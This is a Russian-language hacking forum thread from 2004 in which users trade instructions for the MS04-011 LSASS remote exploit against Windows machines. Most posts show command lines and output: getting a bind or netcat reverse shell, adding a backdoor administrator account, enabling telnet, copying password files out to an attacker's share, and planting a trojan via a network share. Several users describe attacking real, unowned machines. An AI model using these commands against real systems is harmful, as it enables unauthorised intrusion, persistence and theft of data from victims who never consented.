MS04011 Lsasrv.dll RPC buffer overflow remote exploit (PoC) with Un...

mitnick

Guest

Это нравится:0 Да/0 Нет

30.04.2004 20:01:15

Цитата

Гость пишет:
2 > [SpDOMINANT]
да просто, смотри :
<target> <victim IP> <bindport> [connectback IP] [options]
target = ось
victim IP = дырявая тачка
<bindport> = номер порта
[connectback IP] = твой айпи

варианты эксплуатации:
1)если ты не указываешь [connectback IP], то после эксплуатации коннктишься на bindport дырявой тачки
2)если ты указываешь [connectback IP], то предварительно ставишь неткат слушать <bindport> (и к тебе на <bindport> дропается шел)

Пример 1:
=======================================
С:\>HOD-ms04011-lsasrv-expl.exe 2 10.0.ххх.ххх 3333

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 10.0.ххх.ххх: OS: Win2k Advanced Server [SP4] netrap.dll
[*] Connecting to 10.0.ххх.ххх:445 ... OK
[*] Attacking ... OK

c:\telnet 10.0.xxx.xxx 3333

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

E:\WINNT\system32>

Пример 2:
=======================================
(на своей машине)
С:\>nc -l -n -vv -p 3333
listening on [any] 3333 ...

С:\>HOD-ms04011-lsasrv-expl.exe 2 10.0.ххх.ххх 3333 10.0.yyy.yyy

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 10.0.ххх.ххх: OS: Win2k Advanced Server [SP4] netrap.dll
[*] Connecting to 10.0.25.ххх:ххх:445 ... OK
[*] Attacking ... OK

в окне в nc:
H:\>nc -l -n -vv -p 3333
listening on [any] 3333 ...
connect to [10.0.yyy.yyy] from (UNKNOWN) [10.0.xxx.xxx] 2738
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

E:\WINNT\system32>

вот собственно и всё ...

Люди, кто умееет программировать и кому не жалко своего времени а так же жаба не задушит потом делиться ... добишите, пожалуйста, код, чтобы можно было указывать еще изходящий порт для бэк шела =)

a vot reverse shell i ne rabotaet... ibo netcat port zanimaet i drugoi komp connect sdelat' na mozet... no esli nemnogo dopisat' isxodnik to vse na URA!

mitnick

Guest

#122

Это нравится:0 Да/0 Нет

30.04.2004 20:05:23

Цитата

Гость пишет:
Хвати хватит каждый получил что хотел но вот обучать остальному не надо как через фтп слить пароли итд итп лежит рабочая компилед версия и всё тут
и никаких echo open нефиг советовать и выпендриваться и лишний раз говорить "ВАУ ВАУ ВСЁ РАБОТАЕТ" !!очень много даунов тут!
введите наконец обязательную регистрацию.и всякие соски отвянут

meny poprosili - y ob'ysnil. A nas4et registracii ... - ti bi sam v na4ale zaregistrirovalsy. A to o4en' mnogo Gostei tut!

Гость Guest	#123 Это нравится:0 Да/0 Нет 30.04.2004 20:12:49 mitnick постучи,разговор есть 8701259

Guest

#124

Это нравится:0 Да/0 Нет

30.04.2004 22:24:04

Цитата
Strij пишет: А кто-нибудь отслеживал - на машине-жертве появляется новый процесс в момент атаки?

нет, LSASS.EXE начинает слухать на заданном порту, и все.
Никаких крашей и ошибок, все по-тихому.

Гость Guest	#125 Это нравится:0 Да/0 Нет 01.05.2004 01:11:58 У меня из 40 только 2 машины уязвимы плохо((

get

Guest

#126

Это нравится:0 Да/0 Нет

01.05.2004 02:19:29

Дайте хоть апишники где 445 порт не срезан может из внешки есть возможность а то вроде как нормальные админы посрезали все год назад вот тогда бы его. А не срезано только в сегменте подсети а там юзвери которые на хр висят русской а сплоит ее просто перегружает .да добрался народ до 445 порта а так на нем весело было последних 6 месяцев эх пойдем другой порт найдем ))))

^n0th1ng^

Guest

#127

Это нравится:0 Да/0 Нет

01.05.2004 07:01:53

кто то там писал:
Кроме фтп,есть еще способ??или объясните популярно // помоему это был Гость...
Ну вот, расшарь себе ресурс на винте, допустим Share_folder...
//Пр. кл. мыши на расшариваемой папке> Общий доступ и безопастность> Открыть общий доступ к папке //
Потом можно на него сливать, и через него заливать:
copy c:\top_secret.pwd \\Твой_айп\Share_folder
или
copy \\Твой_айп\Share_folder\inet_cracker.exe c:\windows\system32\mss32.exe

chuvak Guest	#128 Это нравится:0 Да/0 Нет 01.05.2004 07:36:39 ftp сервер под винду - http://www.yakrut.narod.ru/ftpd.rar tftp сервер под винду - http://www.yakrut.narod.ru/tftpd.rar

^n0th1ng^

Guest

#129

Это нравится:0 Да/0 Нет

01.05.2004 07:50:08

На уд тачке //
net user USER PASS /add
net localgroup Administrators/Администраторы USER /add
net start telnet
--
коннект телнетом:
telnet VICTIM_IP
Вы намерены передать информацию о пароле на удаленный компьютер в зоне Интернет.
Это может быть небезопасно. Послать в любом случае(y/n):N
USER:1
PASS:1
*=========================================================== =====
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*=========================================================== =====
C:\>copy \\80.XXX.XX.86\A\1.txt c:\
Скопировано файлов:        1.

C:\>dir c:\
Том в устройстве C не имеет метки.
Серийный номер тома: 2F32-18EC

Содержимое папки c:\

24.04.2004   22:17    < ;DIR>   &n bsp;      MANIA
13.03.2004   22:29    < ;DIR>   &n bsp;      Program Files
13.03.2004   22:18    < ;DIR>   &n bsp;      WINDOWS
14.03.2004   12:03    < ;DIR>   &n bsp;      Downloads
01.05.2004   14:36    &nb sp;   & nbsp;       0 1.txt // файл залит!
24.03.2004   15:17    < ;DIR>   &n bsp;      C&M
27.04.2004   16:00    < ;DIR>   &n bsp;      Spirit
09.04.2004   18:00    < ;DIR>   &n bsp;      NVIDIA
13.03.2004   20:00    &nb sp;   & nbsp;     108 CONFIG.SYS
13.03.2004   18:27    &nb sp;   & nbsp;     142 AUTOEXEC.BAT
26.04.2004   22:14    < ;DIR>   &n bsp;      Documents and Settings
                  3 файлов          &nbs p;  250 байт
                  8 папок   3 280 830 464 байт свободно

C:\>

Ну фиг знает... у меня тока через телн с шаров сливает/заливает, иначе кричит
Системная ошибка 5.
Отказано в доступе.

^n0th1ng^ Guest	#130 Это нравится:0 Да/0 Нет 01.05.2004 07:52:05 рИально, мона и через обычный ftp на народе или на by.ru обойтись...

mitnick

Guest

#131

Это нравится:0 Да/0 Нет

01.05.2004 07:58:43

Цитата

^n0th1ng^ пишет:
вот ... делюсь опытом:
На уд тачке //
net user USER PASS /add
net localgroup Administrators/Администраторы USER /add
net start telnet
--
коннект телнетом:
telnet VICTIM_IP
Вы намерены передать информацию о пароле на удаленный компьютер в зоне Интернет.
Это может быть небезопасно. Послать в любом случае(y/n):N
USER:1
PASS:1
*=========================================================== =====
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*=========================================================== =====
C:\>copy \\80.XXX.XX.86\A\1.txt c:\
Скопировано файлов:        1.

C:\>dir c:\
Том в устройстве C не имеет метки.
Серийный номер тома: 2F32-18EC

Содержимое папки c:\

24.04.2004   22:17    < ;DIR>   &n bsp;      MANIA
13.03.2004   22:29    < ;DIR>   &n bsp;      Program Files
13.03.2004   22:18    < ;DIR>   &n bsp;      WINDOWS
14.03.2004   12:03    < ;DIR>   &n bsp;      Downloads
01.05.2004   14:36    &nb sp;   & nbsp;       0 1.txt // файл залит!
24.03.2004   15:17    < ;DIR>   &n bsp;      C&M
27.04.2004   16:00    < ;DIR>   &n bsp;      Spirit
09.04.2004   18:00    < ;DIR>   &n bsp;      NVIDIA
13.03.2004   20:00    &nb sp;   & nbsp;     108 CONFIG.SYS
13.03.2004   18:27    &nb sp;   & nbsp;     142 AUTOEXEC.BAT
26.04.2004   22:14    < ;DIR>   &n bsp;      Documents and Settings
                  3 файлов          &nbs p;  250 байт
                  8 папок   3 280 830 464 байт свободно

C:\>

Ну фиг знает... у меня тока через телн с шаров сливает/заливает, иначе кричит
Системная ошибка 5.
Отказано в доступе.

Sistemnay oshibka u teby iz-za togo 4to null-sessiu ne uzaesh. Podcepi ee spravami admina i mozno o telnete zabit'.

^n0th1ng^

Guest

#132

Это нравится:0 Да/0 Нет

01.05.2004 08:10:58

о null session знаю :
net use \\IP\IPC$ "" /U:""
такаяже хрень:
C:\Windows\System32>net use \\MY_IP\IPC$ "" /U:""
Команда вып. успешно
C:\Windows\System32>net view \\MY_IP
Отказано в доступе и все дела вобщем...
сис. ошибка такаято, помоему #5
Не говоря о copy c:\*.pwd \\MY_IP\ShareD

mitnick

Guest

#133

Это нравится:0 Да/0 Нет

01.05.2004 08:25:37

Цитата

^n0th1ng^ пишет:
о null session знаю :
net use \\IP\IPC$ "" /U:""
такаяже хрень:
C:\Windows\System32>net use \\MY_IP\IPC$ "" /U:""
Команда вып. успешно
C:\Windows\System32>net view \\MY_IP
Отказано в доступе и все дела вобщем...
сис. ошибка такаято, помоему #5
Не говоря о copy c:\*.pwd \\MY_IP\ShareD

net... ti ne ponyl... ti pustuu sessiu delaesh a ti poprobui tak... vot log:
/* U seby na mashinedelaesh pol'zovately i rasharivaesh kakuu-nibud' papku (k primeru "sharing") */

#net user user z /add
The command completed successfully.

#net localgroup Administrators user /add
The command completed successfully.

/* Teper' v ego shelle pishes:*/

#net use \\tvoi_ip\sharing z /user:user
The command completed successfully.

#copy \\tvoi_ip\sharing\trojan.exe %systemroot%\1.exe

U meny vse rabotaet [IMG]http://www.securitylab.ru/forum/smileys/smiley4.gif[/IMG] ... a telnetom mozno no dolshe...... Xoty o vkusax ne sporyt....

mitnick Guest	#134 Это нравится:0 Да/0 Нет 01.05.2004 08:32:37 Da kstati... na xp telnet otsutstvuet.... Y to4no znau 4to on est v w2k.... ob ostal'nix os govorit' ne budu...ne znau. ^n0th1ng^ ti telnet na kakoi OS zapuskal?

Гость Guest	#135 Это нравится:0 Да/0 Нет 01.05.2004 10:25:46 Не ребята я вчера по tftp конкретно предрочился....шняга рулит....и копирует и отсылает бесподобно [IMG]http://www.securitylab.ru/forum/smileys/smiley1.gif[/IMG]

Barmaley Guest	#136 Это нравится:0 Да/0 Нет 01.05.2004 11:27:26 Za4em vsjo tak slozhno. Ja obi4no kopiruju na ta4ku R_SERVER.EXE i paru DDL )) A potom delaj 4to ho4esh ))

Barmaley Guest	#137 Это нравится:0 Да/0 Нет 01.05.2004 13:18:46 Троян всмысле?

Z3k0 Guest	#138 Это нравится:0 Да/0 Нет 01.05.2004 13:31:24 ^n0th1ng^ты хороший и умный ебао заткни своё нафлудил тут ещё обчуает киддис!! lamo кому надо тот сам найдёт у этого топа 4 000 читателей см статистику таких ёбарй как ты впервые вижу.

^n0th1ng^

Guest

#139

Это нравится:0 Да/0 Нет

01.05.2004 13:52:13

Цитата
Z3k0 пишет: ^n0th1ng^ты хороший и умный ебао заткни своё нафлудил тут ещё обчуает киддис!! lamo кому надо тот сам найдёт у этого топа 4 000 читателей см статистику таких ёбарй как ты впервые вижу.

Лано, фиг с тобой... мог бы и без матов, я бы понял, хоть это уже и не моё дело..
Обойдёмся без флейма, ok?

culibin Guest	#140 Это нравится:0 Да/0 Нет 01.05.2004 14:23:52 ет, ребятки-админы, что ни говорите, а без киддисов жизнь скучна. Что то у меня вчера тоскливое настроение было, да и пива выпить хотелось и решил я на охоту сходить, кидисов с lsass эксплоитами половить. Приготовил приманочку (виртуалка с W2K дырявой и открытыми портами), приманочку в капкан положил (сниф на dial-up) и оставил капканчик в лесу (в инете ясно). Через пару часов проверил добычу, а там попалась троица кидисов с ипишниками местного знакомого провайдера. Я бы на этом и остановился, но один из этих уродов уж больно настойчиво пылался выполнить команду del c:\. Разозлился я. Очень разозлися. Добыл я их телефончики, пробил по тел. базе и отправился их навестить. ВЫ БЫ ВИДЕЛИ ИХ РОЖИ!!! P.S. В общем для них (и их рож) все закончилось плохо, а у меня настроение улучшилось, да и пивка на что попить появилось ) P.S.S. Мораль сей басни такова: "Вы все еще взламываете системы? Тогда мы идем к вам!"

Читают тему

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?